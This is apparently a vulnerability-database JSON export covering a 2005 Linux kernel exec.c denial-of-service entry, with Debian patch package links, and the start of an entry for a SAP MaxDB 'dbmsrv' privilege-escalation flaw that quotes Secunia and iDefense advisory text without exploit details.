        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_security_specialist/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r5k-ip22_2.4.17-0.020226.2.woody7_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_m68k.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley_011226.18_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-image-apus_2.4.17-6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody4_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-headers-2.4.17-apus_2.4.17-6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-image-2.4.17-apus_2.4.17-6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-doc-2.4.17_2.4.17-1woody4_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64_32.5_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-ip22_2.4.17-0.020226.2.woody7_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium-smp_011226.18_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32_32.5_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-headers-2.4.17-ia64_011226.18_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley-smp_011226.18_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/20338/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-source-2.4.17-ia64_011226.18_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-64-smp_32.5_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r4k-kn04_2.4.17-0.020226.2.woody7_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.5.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.18.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.18.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-image-2.4.17-r3k-kn02_2.4.17-0.020226.2.woody7_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody7_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-headers-2.4.17_2.4.17-0.020226.2.woody7_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/mips-tools_2.4.17-0.020226.2.woody7_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://www.us.debian.org/security/2006/dsa-1082"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-32-smp_32.5_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-headers-2.4.17_2.4.17-2.woody.5_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/mkcramfs_2.4.17-1woody3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-headers-2.4.17-hppa_32.5_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r5k-ip22_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://www.us.debian.org/security/2006/dsa-1070"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-doc-2.4.19_2.4.19-4.woody3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/20163/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u_26woody1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/mips-tools_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r4k-ip22_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.18-sparc_22woody1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u-smp_22woody1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u_22woody1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.19-sparc_26woody1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u-smp_26woody1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-alpha_2.4.18-15woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://www.us.debian.org/security/2006/dsa-1069"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-headers-2.4.18_2.4.18-1woody6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-patch-2.4.18-powerpc_2.4.18-1woody6.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-benh/kernel-patch-benh_20020304woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1-smp_2.4.18-15woody1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-k6_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/20202/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-386_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-patch-2.4.18-powerpc_2.4.18-1woody6_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1_2.4.18-15woody1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-686-smp_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-586tsc_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-k7_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-image-2.4.18-powerpc_2.4.18-1woody6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-686-smp_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-benh/kernel-patch-benh_20020304woody1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-586tsc_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-686-smp_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.4.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-686_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-k7_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-alpha_2.4.18-15woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-smp_2.4.18-15woody1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-generic_2.4.18-15woody1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-k6_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-image-2.4.18-powerpc-smp_2.4.18-1woody6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-patch-2.4.18-powerpc_2.4.18-1woody6.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.4.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-386_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-doc-2.4.18_2.4.18-14.4_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1-generic_2.4.18-15woody1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-powerpc-xfs/kernel-image-2.4.18-powerpc-xfs_20020329woody1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-k7_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-586tsc_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-i386_2.4.18-13.2.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.18-powerpc/kernel-image-2.4.18-newpmac_2.4.18-1woody6_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-powerpc-xfs/kernel-image-2.4.18-powerpc-xfs_20020329woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-k6_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-i386_2.4.18-13.2.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-386_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-686_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.4_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-686_2.4.18-13.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-benh/kernel-patch-benh_20020304woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-powerpc-xfs/kernel-image-2.4.18-powerpc-xfs_20020329woody1.tar.gz"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-11212"
      },
      {
        "db": "BID",
        "id": "12261"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000023"
      },
      {
        "db": "PACKETSTORM",
        "id": "46873"
      },
      {
        "db": "PACKETSTORM",
        "id": "46534"
      },
      {
        "db": "PACKETSTORM",
        "id": "46587"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-0003"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-057"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-11212"
      },
      {
        "db": "BID",
        "id": "12261"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000023"
      },
      {
        "db": "PACKETSTORM",
        "id": "46873"
      },
      {
        "db": "PACKETSTORM",
        "id": "46534"
      },
      {
        "db": "PACKETSTORM",
        "id": "46587"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-0003"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-057"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2005-04-14T00:00:00",
        "db": "VULHUB",
        "id": "VHN-11212"
      },
      {
        "date": "2005-01-13T00:00:00",
        "db": "BID",
        "id": "12261"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2005-000023"
      },
      {
        "date": "2006-05-31T21:33:01",
        "db": "PACKETSTORM",
        "id": "46873"
      },
      {
        "date": "2006-05-23T05:09:34",
        "db": "PACKETSTORM",
        "id": "46534"
      },
      {
        "date": "2006-05-23T16:45:46",
        "db": "PACKETSTORM",
        "id": "46587"
      },
      {
        "date": "2005-04-14T04:00:00",
        "db": "NVD",
        "id": "CVE-2005-0003"
      },
      {
        "date": "2005-04-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200504-057"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-11212"
      },
      {
        "date": "2007-01-18T02:40:00",
        "db": "BID",
        "id": "12261"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2005-000023"
      },
      {
        "date": "2023-11-07T01:57:08.470000",
        "db": "NVD",
        "id": "CVE-2005-0003"
      },
      {
        "date": "2006-11-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200504-057"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "12261"
      },
      {
        "db": "PACKETSTORM",
        "id": "46873"
      },
      {
        "db": "PACKETSTORM",
        "id": "46534"
      },
      {
        "db": "PACKETSTORM",
        "id": "46587"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-057"
      }
    ],
    "trust": 1.2
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel of  exec.c Service disruption in  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000023"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-057"
      }
    ],
    "trust": 0.6
  }
}

var-200808-0238
Vulnerability from variot

Untrusted search path vulnerability in dbmsrv in SAP MaxDB 7.6.03.15 on Linux allows local users to gain privileges via a modified PATH environment variable. SAP MaxDB is prone to a local privilege-escalation vulnerability that occurs in the 'dbmsrv' process because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary code with 'sdb:sdba' privileges. Successfully exploiting this issue will compromise the affected application and possibly the underlying computer. SAP MaxDB 7.6.03.15 on Linux is vulnerable; other versions running on different platforms may also be affected. ----------------------------------------------------------------------

Want a new job?

http://secunia.com/secunia_security_specialist/ http://secunia.com/hardcore_disassembler_and_reverse_engineer/

International Partner Manager - Project Sales in the IT-Security Industry: http://corporate.secunia.com/about_secunia/64/


TITLE: MaxDB "dbmsrv" Privilege Escalation Vulnerability

SECUNIA ADVISORY ID: SA31318

VERIFY ADVISORY: http://secunia.com/advisories/31318/

CRITICAL: Less critical

IMPACT: Privilege escalation

WHERE: Local system

SOFTWARE: MaxDB 7.x http://secunia.com/product/4012/

DESCRIPTION: A vulnerability has been reported in MaxDB, which can be exploited by malicious, local users to gain escalated privileges.

PROVIDED AND/OR DISCOVERED BY: anonymous researcher, reported via iDefense

ORIGINAL ADVISORY: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=729


About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. iDefense Security Advisory 07.30.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jul 30, 2008

I. BACKGROUND

SAP's MaxDB is a database software product. MaxDB was released as open source from version 7.5 up to version 7.6.00. Later versions are no longer open source but are available for download from the SAP SDN website (sdn.sap.com) as a community edition with free community support for public use beyond the scope of SAP applications. The "dbmsrv" program is set-uid "sdb", set-gid "sdba", and installed by default. For more information, visit the product's website at the following URL.

https://www.sdn.sap.com/irj/sdn/maxdb

II.

When a local user runs the "dbmcli" program, the MaxDB executes a "dbmsrv" process on the user's behalf. The "dbmsrv" process, which is responsible for executing user commands, runs as the user "sdb" with group "sdba".

III.

IV. Other versions may also be vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workaround for this issue.

VI. VENDOR RESPONSE

SAP AG has addressed this vulnerability by releasing a new version of MaxDB. For more information, consult SAP note 1178438.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-1810 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

03/27/2008 Initial vendor notification 04/01/2008 Initial vendor response 07/30/2008 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events http://labs.idefense.com/

X. LEGAL NOTICES

Copyright \xa9 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
